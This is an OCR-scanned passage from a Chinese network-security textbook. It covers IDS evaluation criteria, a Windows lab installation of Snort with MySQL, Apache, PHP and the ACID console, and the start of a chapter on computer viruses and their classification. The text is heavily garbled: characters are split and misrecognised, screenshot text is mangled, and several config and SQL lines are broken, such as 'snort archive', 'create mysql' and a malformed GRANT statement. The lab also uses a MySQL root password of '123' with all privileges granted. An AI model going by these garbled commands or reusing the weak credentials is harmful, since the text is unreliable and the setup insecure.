检查 FTP 传输 的 数据 ,禁止 访问 有 害 网 站 ,判断 非法 HTTP 请 求 等 。 这 两 个 能 力 都 会 直接 
影响 IDS 的 检测 可 信和 度 。 

2. IDS 本 身 的 抗 攻 击 能 力 

和 其 他 系统 一 样 ,IDS 本 身 也 往往 存在 安全 漏洞 。 若 对 IDS 攻击 成 功 , 则 直接 导致 其 报 
警 失 灵 , 和 侵 者 在 其 后 所 做 的 行为 将 无 法 被 记录 。 因 此 IDS 首先 必须 保证 自己 的 安全 性 。 
IDS 本 身 的 抗 攻击 能 力也 就 是 IDS 的 可 靠 性 ,用 于 衡量 IDS 对 那些 经 过 特别 设计 直接 以 
IDS 为 攻击 目标 的 攻击 的 抵抗 能 力 。 它 主要 体现 在 两 个 方面 : 一 是 程序 本 身 在 各 种 网 络 环 
境 下 能 够 正常 工作 ; 二 是 程序 各 个 模块 之 间 的 通信 能 够 不 被 破坏 ,不 可 仿冒 。 此 外 要 特别 
考虑 抵御 拒绝 服务 攻击 的 能 力 。 如 果 IDS 本 身 不 能 正常 运行 ,也 就 失去 了 它 的 保护 意义 。 
而 如 果 系 统 各 模块 间 的 通信 遭 到 破坏 , 那 系统 的 报警 之 类 的 检测 结果 也 就 值得 怀疑 ,应 该 有 
一 个 良好 的 通信 机 制 保证 模块 间 通信 的 安全 并 能 在 出 问题 时 能 够 迅速 恢复 。 

3. 其 他 性 能 指标 

延迟 时 间 。 检 测 延迟 指 的 是 在 攻击 发 生 至 IDS 检测 到 入 侵 之 间 的 延迟 时 间 。 延 迟 时 
间 的 长 短 直接 关系 着 入 侵 攻 击破 坏 的 程度 。 


资源 的 占用 情况 。 即 系统 在 达到 某 种 检测 有 效 性 时 对 资源 的 需求 情况 。 通 常 , 在 同等 
检测 有 效 性 的 前 提 下 ,对 资源 的 要 求 越 低 ,IDS 的 性 能 越 好 ,检测 入 侵 的 能 力也 就 越 强 。 

负荷 能 力 。IDS 有 其 设计 的 负荷 能 力 ,在 超出 负荷 能 力 的 情况 下 ,性 能 会 出 现 不 同 程度 
的 下 降 。 比 如 ,在 正常 情况 下 IDS 可 检测 到 某 攻 击 但 在 负荷 大 的 情况 下 可 能 就 检测 不 出 该 
攻击 。 考 察 检 测 系统 的 负荷 能 力 就 是 观察 不 同 大 小 的 网 络 流量 、 不 同 强 度 的 CPU 内 存 等 
系统 资源 的 使 用 对 IDS 的 关键 指标 (比如 检测 率 、 虚 警 率 ) 的 影响 。 


15.3.2 入 侵 检 测 系统 测试 评估 标准 


根据 Porras 等 的 研究 ,给 出 了 评价 IDS 性 能 的 3 个 因素 。 

准确 性 (Accuracy) : 指 IDS 从 各 种 行为 中 正确 地 识别 入 侵 的 能 力 , 当 一 个 IDS 的 检测 
不 准确 时 ,就 有 可 能 把 系统 中 的 合法 活动 当做 入 侵 行为 并 标识 为 异常 ( 虚 警 现象 ) 。 

处 理性 能 (Performance) : 指 一 个 IDS 处 理 数 据 源 数据 的 速度 。 显 然 , 当 IDS 的 处 理性 
能 较 差 时 , 它 就 不 可 能 实现 实时 的 IDS, 并 有 可 能 成 为 整个 系统 的 瓶颈 ,进而 严重 影响 整个 
系统 的 性 能 。 

完备 性 (Completeness) : 指 IDS 能 够 检测 出 所 有 攻击 行为 的 能 力 。 如 果 存 在 一 个 攻击 
行为 ,无 法 被 IDS 检测 出 来 ,那么 该 JDS 就 不 具有 检测 完备 性 。 也 就 是 说 , 它 把 对 系统 的 入 
侵 活 动 当做 正常 行为 ( 漏 报 现象 )。 由 于 在 一 般 情况 下 ,攻击 类 型 攻击 手段 的 变化 很 快 ,很 
难得 到 关于 攻击 行为 的 所 有 知识 ,所 以 关于 IDS 的 检测 完备 性 的 评估 相对 比较 困难 。 

在 此 基础 上 ,Debar 等 人 又 增加 了 两 个 性 能 评价 测度 。 

容错 性 (Fault Tolerance) : 由 于 IDS 是 检测 人 侵 的 重要 手段 ,所 以 它 也 就 成 为 了 很 多 
入 侵 者 攻击 的 首选 目标 。IDS 自身 必须 能 够 抵御 对 它 自身 的 攻击 ,特别 是 拒绝 服务 (Denial- 
of-Service) 攻 击 。 由 于 大 多 数 的 IDS 是 运行 在 极 易 遭受 攻击 的 操作 系统 和 硬件 平台 上 ,这 
就 使 得 系统 的 容错 性 变 得 特别 重要 ,在 测试 评估 IDS 时 必须 考虑 这 一 点 。 

及 时 性 CTimeliness) : 及 时 性 要 求 IDS 必须 尽快 地 分 析 数 据 并 把 分 析 结 果 传播 出 去 ,以 
使 系统 安全 管理 者 能 够 在 和 人 侵 攻 击 尚未 造成 更 大 危害 以 前 做 出 反应 ,阻止 人 侵 者 进一步 的 
破坏 活动 ,和 上 面 的 处 理性 能 因素 相 比 ,及 时 性 的 要 求 更 高 。 它 不 仅 要 求 IDS 的 处 理 速 度 
要 尽 可 能 地 快 ,而 且 要 求 传播 .反应 检测 结果 信息 的 时 间 尽 可 能 少 。 


15.4 入 侵 检 测 系统 实例 : Snort 


Snort 是 一 个 轻 量 级 的 网 络 入 侵 检测 系统 ,所 谓 轻 量 级 是 指 该 软件 在 运行 时 只 占用 极 
少 的 网 络 资源 ,对 原 有 网 络 性 能 影响 很 小 。 从 数据 来 源 上 看 , 它 是 一 个 基于 网 络 入 侵 的 检测 
软件 , 即 它 作 为 嗅 探 器 对 发 往 同 一 网 络 的 其 他 主机 的 流量 进行 捕获 ,然后 进行 分 析 。 它 的 工 
作 采 用 误 用 检测 模型 , 即 首先 建立 人 侵 行为 特征 器 ,然后 在 检测 过 程 中 ,将 收集 到 的 数据 包 
和 特征 代码 r 进行 比较 ,以 得 出 是 否 人 侵 的 结论 。 它 是 用 C 语言 编写 的 开放 源 代 码 网 络 人 
侵 检测 系统 。 其 源 代 码 可 以 被 自由 读 取 、 传 播 和 修改 ,任何 一 个 程序 员 都 可 以 自由 地 为 其 添 
加 功能 ,修改 错误 ,任意 传播 。 这 使 它 能 迅速 发 展 完 善 并 推广 应 用 。 它 是 一 个 跨 平台 的 软 
件 , 所 支持 的 操作 系统 非常 广泛 。 下 面 简要 介绍 在 Windows 环境 下 的 平台 搭建 。 


入 侵 检 测 捞 术 


山东 


秦 于 案例 的 网 络 安全 技术 与 实践 


1. 实验 软件 

(1) Microsoft Virtual PC 虚拟 机 。 

(2) Windows Server 2003 镜像 文件 。 

(3) 网 络 数据 包 截 取 驱 动 程序 WinPcap_4_1_2. zip, 地 址 : http://winpcap. 
polito. it/ 。 
www. snort. org/ 。 

(5) Windows 版 本 的 Apache Web 服务 器 : apache_2. 2. 4-win32-x86-no_ssl. zip, 地址: 
http://www. apache. org/ 。 

(6) Windows 版 本 的 PHP 脚本 环境 支持 : php-5. 2. 5-Win32. zip, 地 址 : http://www. 
php. net/ 。 

(7) Windows 版 本 的 Mysql 数据 库 服务 器 : mysql-5. 0. 22-win32. zip ,地址 : http:// 
www. mysql. com/ 。 

(8) ACID(Analysis Console for Intrusion Databases) 基 于 PHP 的 入侵 检测 数据 库 分 
析 控 制 台 : acid-0. 9. 6b23. tar. gz, 地 址 : http://www. cert. org/kb/acid。 

(9) Adodb(Active Data Objects Data Base) PHP 库 : adodb504. tgz, 地 址 : http:// 
php. weblogs. com/adodb。 

(10) PHP 图 形 库 : jpgraph-2. 3. tar. gz, 地 址 : http://www. aditus. nu/jpgraph。 

(11) Snort 规则 包 : rules20090505. tar. gz, 地 址 : http://www. snort. org。 

2. 安装 步 骏 

(1) 虚拟 机 和 操作 系统 的 安装 : 运行 虚拟 机 安装 程序 ,默认 安装 即 可 ,打开 控制 台 ， 
建 一 个 虚拟 机 ,按照 提示 具体 填写 ,选择 镜像 文件 ,启动 。 

(2) 组 件 的 安装 。 

在 c: 下 建立 duoduo 的 文件 夹 , 再 在 其 下 建立 duo 的 文件 夹 放 入 所 有 的 安装 程序 ,在 后 
续 的 安装 时 ,把 可 以 选择 安装 路 径 的 组 件 安装 在 duoduo 的 文件 夹 下 。 

@ 安装 WinPcap: 运行 WinPcap_4_1_2. zip, 以 默认 设置 安装 。 

@ 安装 mysql: 运行 mysql-5. 0. 22-win32. zip, 选 择 自 定义 安装 ,选择 安装 路 径 C:\duoaduo\ 
mysql 下 ,安装 时 端口 设置 为 3306, 密 码 本 实验 设置 成 123, 如 图 15.9 和 图 15. 10 所 示 。 


mySQL Server 
MySQL Server Instance Configuration 
Configure the My5QL Server 5,1 server instance. 


Instance Configuration Wirard 


Please set the networkng options, 
[Enable TCP/IP Networking 
Enable this to alow TCP/IP connections. When disabled, only local 
| 时 
Port mber 国 轴 |] 厂 Addfrewalexceptonforthsport 


Please set the server SQL mode. 


[7 Enable Strict Mode 
This option forces the server to behave more Ike a traditional 
Server. is to enable this option , 


cams | cme 


15.9 配置 端口 


(arSQL Server Instance Configuration Fizera 
MySQL Server Instance Configuration 
Configure the My5QL Server 5.1 server instance， \ 
Please set the security options, 
Modify Security Settings 


四 New root password: pe Enker the root password. 
me Confirm: [ee 


Retype the password， 


三 Enable root access from remote machines 


厂 Create An Anonymous account 


This option wil create an anonymous account on this server. Please 
note that this can lead to an insecure system. 


< Back Cancel 
图 15.10 配置 密码 


添加 环境 变量 如 图 15. 11 所 示 。 


篇 辑 厌 统 变 量 了 xl 
变量 名 中 Path 
变量 值 W) fC: \duoaduo\mysql \bin; XSystenRootX\s: 


Cu ] ww | 


图 15.11 配置 环境 变量 


2 7 


G) 安装 apache: 运行 apache_2. 2. 4-win32-x86-no_ ssl. zip, 安装 到 c:\ duoaduo\ 
apache。 

图 php: 解压 php-5. 2.5-Win32 到 c:\duoaduo\php, 添 加 gd 图 形 库 支持 ,复制 c: 
\duoaduo\ php\php5ts. dll 和 c: \ duoaduo\php\libmysql. dll 文件 到 % systemroot%\ 
system32 ,查询 本 机 的 %systemroot，% ,如 图 15. 12 所 示 。 


Microsoft Window: 
KC》 版 权 所 有 1985-2883 Microsoft Corp. 


Docunents and Settings\hdninistratoryecho 


Docunents and Settings\hdninistrator> 


图 15. 12 查询 机 的 %systemroot% 


复制 c: \duoaduo\php\php. ini-dist 到 %systemroot% 并 重 命名 为 php. ini, 修 改 php 
.ini, 分 别 去 掉 “extension 二 php_ gd2. dll” 和 “extension 二 php_mysql. dll” 前 的 分 号 ,如 
图 15.13 所 示 。 

然后 指定 extension_dir 二 "c:\duoaduo\php\ext" ,如 图 15. 14 所 示 。 


入 侵 


山 杞 


基于 烘 鲍 的 网 络 安 会 技 太 与 实践 


-oly 
文件 四 编辑 下 ) 格式 (0) 查看 WD 帮助 由 


Windows Extensions 

Note that ODBC support is built in, so no dll is needed for it. 
Note that nany DLL files are located in the extensions/ (PHP 4) 
; extension folders as well as the separate PECL DLL download (PHI 
; Be sure to appropriately set the extension dir directive. 


;extension=php_bz2.d11 
;extension=php_cur1.d11 
;extension=php_dba.dll 本 | 
;extension=php_dbase.dl1 
;extension=php_exif -d]11 
;extension=php_fdf.dl1 
xtension=php_gd2.d11 
;extension=php_gettext .d11 
;extension=php_gmp -dl11 
;extension=php_ifx.d1l 
;extension=php_inmap .d11 
;extension=php_interbase.dll 
;extension=php_1ldap .d11 


15.13 配置 php. ini(1) 


加 
文件 中 ”编辑 于 ) 格式 @) 查看 帮助 0) 
习 


; The root of the PHP pages, used only if nonempty. 

; if PHP was not compiled with FORCE REDIRECT, you SHOULD set doc. 
3 if you are running php as a CGI under any web server (other thal 
; see documentation for security issues. The alternate is to use 
; cgi.force redirect configuration below 

doc_root = 


; The directory under which PHP opens the script using /~usernane 一 


; Directory in which the loadable extensions (modules) reside. 
extension dir = “c:\duoaduo\php\ext" 


; Whether or not to enable the dl1() function. The di() function' 
; properly in multithreaded servers, such as IIS or Zeus, and is . 
; disabled on them. 

enable_dl = On 


图 15.14 配置 php. ini(2) 


同时 复制 c:\duoaduo\php\ext 下 的 php_gd2. dll 与 php_mysql. dll 到 %systemroot%\ 
system32。 在 C;\duoaduo\apache\conf\httpd. conf 中 添加 LoadModule php5_module c:/ 
duoaduo/php/php5apache2 _ 2. dll 和 AddType application/x-httpd-php. php, AddType 
application/x-httpd-php-source. phps, 如 图 15.15 所 示 。 

重启 Apache 服务 ,在 C:\duoaduo\apache\htdocs 目录 下 新 建 webinf. php( 文 件 内 容 
为 : 二 ? phpinfo();? 二 ) 并 使 用 http://127. 0. 0. 1/webinf. php 访问 测试 是 否 能 够 显示 当 
前 Apache 服务 器 的 信息 ,如 果 能 够 显示 表明 Apache 和 php 工作 基本 正常 ,如 图 15. 16 
所 示 。 

@@ 安装 Snort。 


加 httpd. conf - 记事 本 =| 口 | x| 
文件 全 编辑 EE) 格式) 查看 人 帮助 

# AddEncoding allows you to have certain browsers uncompress 之 
# information on the fly. Note: Not all browsers support this 
拓 


#AddEncoding x-compress .Zz 

#AddEncoding x-gzip .gz .tgz 

# 

# If the AddEncoding directives aboue are comnented-out, then 
# probably should define those extensions to indicate media ti 
#1 


AddType application/x-compress .2 


AddType application/x-httpd-php 


AddHandler allows you to map certain file extensions to “hal| 
actions unrelated to filetype. These can be either built in 
or added with the Action directive (see below) 


To use CGI scripts outside of ScriptAliased directories: 


和 | 2 Mindors Ex .. wtpa eone- phpineo0 -| | 久 | 她 
15.15 配置 httpd. conf 


了 | 


到 phpinfo() - Microsoft Internet Explorer 


文件 @) 编辑 到 ) 查看 外) 收藏) 工具 ) 


回报 - 占 - 四 国信 | 闪 扫 索 六 收藏 天 由 提 体 如 | -所 恒 


| 


15.16 正确 运行 Apache 和 php 
成 功 会 出 现 一 个 可 爱 的 小 猪 形象 ,如 图 15. 17 所 示 。 
@ 修改 C:\duoaduo\Snort\etc\snort. conf 文件 : 


var RULE_PATH c:\duoaduo\snort\rules 
include classification. config 
include reference. config 


修改 为 绝对 路 径 


include c:\duoaduo\snort\etc\classification. config 


入 侵 检 测 投 术 


需 范 


基于 案例 的 网 络 安 会 投 术 与 实践 


nort == 一 


pcap DAQ configured 
Acquiring network tr ice\NPF_{6B44E959-A812—4A8D-9A7! 
》， 

ding Ethernet 


== Initializ 


x》 Snortt 《xx 


Uersion 2.9-8-5-0DBC FlexR WIN32 GRE CBuild 135> 


By Martin Roe http://www.snort 


图 15.17 ”Snort 运行 正常 


include c:\duoaduo\snort\etc\reference. config 
在 该 文件 的 最 后 加 入 下 面 语句 : 


output database: alert, mysql, host = localhost user = root password = 123 dbname = snort 

encoding = hex detail = full 

@ 创建 snort 数据 库 的 表 : 

复制 c:\duoaduo\snort\schames 文件 夹 下 的 create_mysql 文件 到 C:\duoaduo\mysql 
\bin 文件 夹 下 ,打开 mysql 的 客户 端 执行 如 下 命令 : 


Create database snort; 

Create database snort archive; 

Use snort; 

Source create_mysql; 

Use snort_archive; 

Source create mysql; 

Grant all on *.* to "root"(@"localhost" 


@ 加 入 php 对 mysql 的 支持 : 

修改 c:\windows\php. ini 文件 .去掉 extension 王 php_mysql. dll 前 的 分 号 。 

复制 c:\duoaduo\php\ext 文件 夹 下 的 php_mysql. dll 文件 到 c:\windows 文件 夹 。 

复制 c:\duoaduo\php\libmysql. dll 文件 到 c:\windows\system32 下 。 

@@ 安装 adodb: 解压 缩 adodb 到 c:\ids\php5\adodb 文件 夹 下 。 

四 安装 jgraph: 解压 缩 jpgraph 到 c:\duoaduo\php\jpgraph 文件 夹 下 。 

@ 安装 acid: 解压 缩 acid 到 c\duoaduo\apache\htdocs\acid 文件 夹 下 ,并 修改 acid_ 
conf. php 文件 为 以 下 大 


$ DBlib_path = "c:\duoaduo\php\adodb"; 


$ DBtype = "mysql"; 

$alert dbname = "snort"; 

$alert host = "localhost"; 
$alert port = "3306"; 

S$ alert user = "root"; 

$ alert password= "123"; 

$ archive_ dbname = "snort archive"; 
$ archive_host = "localhost"; 

$ archive port = "3306"; 

$ archive user = "root"; 

$ archive password= "123"; 

$ ChartLib path= "c:\duoaduo\php\jpgraph\src"; 


中 重启 apache .mysql 服务 
3 在 浏览 器 中 初始 化 acid 数据 库 : http://localhost/acid/acid_db_setup. php。 如 
图 15. 18 所 示 , 则 配置 正确 。 


于 ACID: DD Setup 已 可 到 
文件 中” 绩 辑 外 查看 WD 收藏) 工具 G) 帮助 0 | 并 
回民 - 昌 -四 固 作品 扫 雪 六 收 戈 夹 嫩 揽 体 如 | 1)- 久 电 


地 址 @) | 乱 http //1ocalhost/ocid/acid_db_setup. php 了 园 和 | 链接 > 


Microsoft Internet Explorer 


Home 
B Setup Search ，AG Maintenance 
[Back] 
BID eles Adds tables to extend the Snort DB to support the ACID functionality DONE 
Search Indexes DONE 


(Optional) Adds indexes to the Snort DB to optimize the speed of the queries 


The underlying Alert DB is configured for usage with ACID. 


Additional DB permissions 
In order to support Alert purging (the selective ability to permanently delete alerts from the database) and DNSAwhois lookup 
caching, the DB user "root" must have the DELETE and UPDATE privilege on the database "snort@localhost" 


Goto the Main page to use the application. 
[Loaded in0 seconds] 


Roman Danyliw AirCERT 


| 


厂 厂 厂 隔 本 地 Intranet 
图 15.18 正确 配置 ACID 
启动 Apache 和 mysql 服务 ,运行 ACID: 打开 浏览 器 ,地 址 为 http://127. 0. 0. 1/acid。 
如 图 15. 19 所 示 , 则 表示 ACID 安装 成 功 。 


至 此 ,Snort 的 Windows 环境 下 的 平台 搭建 完毕 ,更 详细 的 规则 配置 请 查阅 Snort 
手册 。 


入 侵 检 测 基 术 


山东 


秦 于 案例 的 网 络 安全 技术 与 实践 


[| 科 hetp://127.0.0.1/3cd/acd menphp 回回 高 [5& 回 帮 


Ana onsole fo on Database 


Added 0 alert(s] to the Alert cache 


Queried on : Mon September 26, 2005 11:11:12 
Database: snon@localhost «(schema version: 106) 
Time window: no alerts datected 


nsors: 0 FE [Traffic Profile by Protocol 
Unique Alerts: 0 ( 0 categories ) TCP @ 
era umber et Aten | 


® SourceIP addresses: 0 人 


a Deol Pedder CR 
» Unique IP inks 0 ICMP @W) 
| 
» Source Pors: 0 
© TCP (0) UDP (0) Portscan Trafic @) 


。 Dest Pons: 0 IE 
9 TCP (0) UDP (0) 


» Graphic Alert Data 


» Snapyhut 
» Most racent Alerts: any protocol, TCP, UDP, ICMP » Most frequent5 Alerts 
» Todays: alerts unique, Iisting; IP sre / dst 
» Last 24 Hours alerts unique, listing; IP src / dst 。 Most Frequent Source Ports any , TCP , UDP 
。 Last 72 Hours alerts unique, Iisting; IP src / dst 。 Most Frequent Destnation Ports: any ,TCP ,UDP 


Most racent 15 Unique Alerts 


图 15.19 正确 安装 ACID 


15.5 小 结 


传统 的 网 络 安 全 技术 以 防护 为 主 , 即 采 用 以 防火 墙 为 主体 的 安全 防护 措施 。 但 是 , 面 对 
网 络 规模 化 和 入 侵 复 杂 化 的 发 展 趋势 ,以 防火 墙 技 术 为 主 的 防御 技术 越 来 越 显 得 力不从心 ， 
由 此 产生 了 入 侵 检 测 技术 。 本 童 全 面 介绍 了 入 侵 检 测 技术 ,重点 讲解 了 入 侵 检测 的 有 关 理 
论 知识 ,技术 原理 和 应 用 案例 。 


15.6 习 题 


1. 分 布 式 人 侵 检测 系统 (DIDS) 是 如 何 把 基于 主机 的 人 侵 检测 方法 和 基于 网 络 的 入 侵 
检测 方法 集成 在 一 起 的 ? 

2. 入 侵 检 测 系统 的 作用 体现 在 哪些 方面 ? 

3. 为 什么 说 研究 和 人 侵 检测 非常 必要 ? 

4. 异常 人 侵 检测 系统 的 设计 原理 是 什么 ? 

5. 误 用 入 侵 检测 系统 的 优 缺 点 分 别 是 什么 ? 

6. 随 着 网 络 技术 和 相关 学 科 的 发 展 , 入侵 检测 系统 的 未 来 发 展 趋 势 主要 表现 在 哪些 


15.7 实 验 


1. Snort 的 配置 。 
2. 利用 Snort 发 现 并 设计 入 侵 企图 。 


第 16 章 计算 机 病毒 .恶意 代码 及 防范 


我 认为 计算 机 病毒 应 该 当做 生命 。 它 道 出 了 人 性 的 某 些 方面 : 那 就 是 ,迄今 为 止 
我 们 所 创造 出 的 生命 的 唯一 的 形式 纯粹 是 破坏 性 的 。 我们 照 自己 的 形象 创造 生命 。 
一 斯 蒂 芬 。 堆 金 


堡垒 最 容易 从 内 部 攻破 。 神 马 都 是 浮云 ,木马 却 是 灾 星 。 
-一 网 络 流行 语 


16.1 计算 机 病毒 概述 


随 着 计算 机 在 各 行业 的 大 量 应 用 ,计算 机 病毒 也 随 之 渗透 到 计算 机 世界 的 各 个 角落 , 常 
以 人 们 意 想不到 的 方式 侵入 计算 机 系统 。 计 算 机 病毒 的 流行 引起 了 人 们 的 普遍 关注 ,成 为 
影响 计算 机 安全 运行 的 一 个 重要 因素 。 随 着 网 络 的 普及 ,计算 机 病毒 的 传播 速度 大 大 加 快 ， 
传播 形式 与 破坏 方式 也 有 了 新 的 变化 。 本 章 将 讨论 计算 机 病毒 的 问题 。 


16.1.1 计算 机 病毒 的 概念 


计算 机 病毒 (Computer Virus) 与 生物 学 上 的 “病毒 "不 同 , 它 不 是 天 然 存 在 的 ,而 是 某 些 
人 利用 计算 机 软件 与 硬件 的 缺陷 ,编制 的 具有 特殊 功能 的 程序 。 由 于 计算 机 病毒 具有 与 生 
物 学 病毒 相 类 似 的 特征 (潜伏 性 、 传 染 性 发作 期 等 ), 所 以 人 们 就 形象 地 将 生物 学 中 的 病毒 
概念 引入 到 计算 机 科学 中 。 

早 在 1949 年 ,计算 机 的 先驱 者 汉 。 诺 依 曼 在 他 的 一 篇 文章 (复杂 自动 装置 的 理论 及 组 
织 的 行为 ?中 就 提出 了 一 种 会 自我 繁殖 的 程序 的 可 能 ,但 没 引 起 注意 。“ 计 算 机 病毒 "这 一 概 
念 是 1977 年 由 美国 著名 科普 作家 雷 恩 在 一 部 科幻 小 说 (Pl 的 青春 》 中 提出 。1983 年 美国 
的 Fred Cohen 博士 曾 对 计算 机 病毒 进行 过 定义 : 计算 机 病毒 是 一 种 程序 , 它 用 修改 其 他 程 
序 的 方法 将 自身 的 精确 副本 或 者 演化 的 副本 放 入 到 其 他 程序 ,从 而 感染 其 他 程序 。 由 于 这 
种 感染 特性 ,病毒 可 以 在 信息 流 的 过 渡 途 径 中 传播 ,从 而 破坏 信息 的 完整 性 。 在 1988 年 他 
又 著 文 强调 : 病毒 不 是 利用 操作 系统 运作 的 错误 和 缺陷 的 程序 ,病毒 是 正常 的 程序 ,它们 仅 
使 用 了 那些 每 天 都 被 使 用 的 正常 操作 。 上 述 定义 被 美国 的 计算 机 专家 在 有 关 病 毒 的 论文 中 
频繁 引用 。 

1994 年 2 月 18 日 ,我 国正 式 实 施 了 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 
例 ), 在 条 例 二 十 八条 中 明确 指出 :“ 计 算 机 病毒 是 指 编制 或 者 在 计算 机 程序 中 插入 的 破 
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坏 计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 用 并 且 能 够 自我 复制 的 一 组 计算 机 指令 或 者 
程序 代码 ”。 


16.1.2 计算 机 病毒 的 将 征 


1. 寄生 性 

计算 机 病毒 寄生 在 其 他 程序 之 中 ,被 嵌入 的 程序 叫做 宿主 程序 。 当 执行 这 个 程序 时 , 病 
毒 就 起 破坏 作用 ,而 在 未 启动 这 个 程序 之 前 , 它 是 不 易 被 人 发 觉 的 。 

2. 传染 性 (感染 性 ) 

计算 机 病毒 不 但 本 身 具 有 破坏 性 ,更 有 害 的 是 具有 传染 性 ,一 旦 病毒 被 复制 或 产生 变 
种 ,其 速度 之 快 令 人 难以 预防 。 是 否 具有 传染 性 是 判别 一 个 程序 是 否 为 计算 机 病毒 的 最 重 
要 条 件 。 病 毒 程序 通过 修改 磁盘 扇 区 信息 或 文件 内 容 并 把 自身 嵌入 到 其 中 的 方法 达到 病毒 
的 传染 和 扩散 。 

3. 潜伏 性 

计算 机 病毒 潜伏 性 是 指 计 算 机 病毒 可 以 依附 于 其 他 媒体 寄生 的 能 力 , 侵 入 后 的 病毒 潜 
伏 到 条 件 成 熟 才 改作。 例如 黑色 星期 五 病毒 ,不 到 预定 时 间 一 点 都 觉察 不 出 来 ,等 到 条 件 具 
备 的 时 候 一 下 子 就 爆炸 开 来 ,对 系统 进行 破坏 。 

4. 隐蔽 性 

有 些 病毒 通过 隐藏 自己 而 防止 被 检测 出 来 。 具 有 隐蔽 性 的 病毒 把 自己 伪装 成 合法 的 程 
序 或 用 其 具有 破坏 性 的 代码 蔡 换 掉 合法 程序 的 部 分 代码 。 

5. 破坏 性 

计算 机 中 毒 后 ,可 能 会 导致 正常 的 程序 无 法 运行 ,把 计算 机 内 的 文件 删除 或 受到 不 同 程 
度 的 损坏 。 通 常 表现 为 增删 、 改 、 移 。 

6. 可 触发 性 

病毒 因 某 个 事件 或 数值 的 出 现 , 诱 使 病毒 实施 感染 或 进行 攻击 的 特性 称 为 可 触发 性 。 
病毒 运行 时 ,触发 机 制 检查 预定 条 件 是 否 满足 ,如 果 满 足 , 启 动感 染 或 破坏 动作 ,使 病毒 进行 
感染 或 攻击 ; 如 果 不 满足 ,使 病毒 继续 潜伏 。 例 如 所 谓 的 时 间 炸 弹 (Time bombs) ,能 够 在 
发 作 日 期 到 来 之 前 一 直 保 持 潜伏 和 无 害 状态 。 

7. 加 密 性 

有 些 病毒 通过 加 密 而 防止 被 检测 出 来 。 大 多 数 病 毒 扫描 软件 就 是 通过 搜索 文件 来 发 现 
那些 标识 病毒 的 字符 串 而 扫描 病毒 的 。 如 果 病 毒 被 加 密 了 , 它 就 会 阻止 反 病 毒 程序 对 它 进 
行 检测 。 

8. 多 态 性 

具有 多 态 性 的 病毒 在 每 次 传输 到 一 个 新 的 系统 时 都 会 修改 它们 自己 的 特性 (例如 ,对 它 
们 的 字 节 、 大 小 和 内 部 指令 的 安排 ) ,这 样 就 使 得 要 辨认 它们 变 得 更 加 困难 。 有 些 多 态 性 病 
毒 使 用 复杂 的 算法 并 编 入 一 些 乱七八糟 的 命令 来 达到 这 种 修改 的 目的 。 多 态 性 病毒 被 认为 
是 最 复杂 并 且 潜 在 威胁 最 大 的 一 种 病毒 。 


16.1.3 计算 机 病毒 的 分 类 
目前 出 现 的 计算 机 病毒 种 类 繁多 ,同时 ,一 种 病毒 也 会 发 生 多 种 变形 。 根 据 计算 机 病毒 


的 特征 和 表现 的 不 同 ,计算 机 病毒 有 多 种 分 类 方法 。 

(1) 按照 计算 机 病毒 存在 的 媒体 进行 分 类 : 根据 病毒 存在 的 媒体 ,病毒 可 以 划分 为 网 
络 病毒 .文件 病毒 .引导 型 病毒 。 网 络 病毒 通过 计算 机 网 络 传播 感染 网 络 中 的 可 执行 文件 ， 
文件 病毒 感染 计算 机 中 的 文件 (如 : COM、EXE、DOC 等 ) ,引导 型 病毒 感染 启动 扇 区 (Boot) 
和 硬盘 的 系统 引导 扇 区 (MBR) ,还 有 这 3 种 情况 的 混合 型 ,例如 : 多 型 病毒 (文件 和 引导 型 ) 
感染 文件 和 引导 扇 区 两 种 目标 ,这 样 的 病毒 通常 都 具有 复杂 的 算法 ,它们 使 用 非常 规 的 办 法 
侵入 系统 ,同时 使 用 了 加 密 和 变形 算法 。 

(2) 按照 计算 机 病毒 传染 的 方法 进行 分 类 : 这 类 病毒 可 分 为 驻 留 型 病毒 和 非 驻 留 型 病 
毒 , 驻 留 型 病毒 感染 计算 机 后 ,把 自身 的 内 存 驻 留 部 分 放 在 内 存 (RAM) 中 ,这 一 部 分 程序 挂 
接 系 统 调用 并 合并 到 操作 系统 中 去 , 它 处 于 激活 状态 ,一 直到 关机 或 重新 启动 。 非 驻 留 型 病 
毒 在 得 到 机 会 激活 时 并 不 感染 计算 机 内 存 ,一 些 病毒 在 内 存 中 留 有 小 部 分 ,但 是 并 不 通过 这 
一 部 分 进行 传染 ,这 类 病毒 也 被 划分 为 非 驻 留 型 病毒 。 

(3) 根据 病毒 破坏 的 能 力 可 划分 为 以 下 几 种 : 

OO 无 害 型。 除了 传染 时 减少 磁盘 的 可 用 空间 外 ,对 系统 没有 其 他 影响 。 

@ 无 危险 型 。 这 类 病毒 仅仅 是 减少 内 存 、. 显 示 图 像 .发 出 声音 及 同类 音响 。 

@ 危险 型 。 这 类 病毒 在 计算 机 系统 操作 中 造成 严重 的 错误 。 

@ 非常 危险 型 。 这 类 病毒 删除 程序 破坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 重要 的 
信息 。 这 些 病 毒 对 系统 造成 的 危害 ,并 不 是 本 身 的 算法 中 存在 危险 的 调用 ,而 是 当 它们 传染 
时 会 引起 无 法 预料 的 和 灾难 性 的 破坏 。 

(4) 根据 病毒 特有 的 算法 ,病毒 可 以 划分 为 

Q@ 伴随 型 病毒 。 这 一 类 病毒 并 不 改变 文件 本 身 , 它 们 根据 算法 产生 EXE 文件 的 伴随 
体 , 具 有 同样 的 名 字 和 不 同 的 扩展 名 (COM) ,例如 : XCOPY. EXE 的 伴随 体 是 XCOPY 
.COM。 病 毒 把 自身 写 人 COM 文件 并 不 改变 EXE 文件 , 当 DOS 加 载 文件 时 ,伴随 体 优 先 
被 执行 到 ,再 由 伴随 体 加 载 执行 原来 的 EXE 文件 。 

@@“ 蠕 虫 ”型 病毒 。 通 过 计算 机 网 络 传播 ,不 改变 文件 和 资料 信息 ,利用 网 络 从 一 台 机 
器 的 内 存 传播 到 其 他 机 器 的 内 存 , 计 算 网 络 地 址 ,将 自身 的 病毒 通过 网 络 发 送 。 有 时 它们 在 
系统 存在 ,一 般 除了 内 存 不 占用 其 他 资源 。 

@ 寄生 型 病毒 。 它 们 依附 在 系统 的 引导 扇 区 或 文件 中 ,通过 系统 的 功能 进行 传播 , 按 
其 算法 不 同 可 分 为 : 练习 型 病毒 ,病毒 自身 包含 错误 ,不 能 进行 很 好 的 传播 ,例如 一 些 病毒 
处 于 调试 阶段 。 

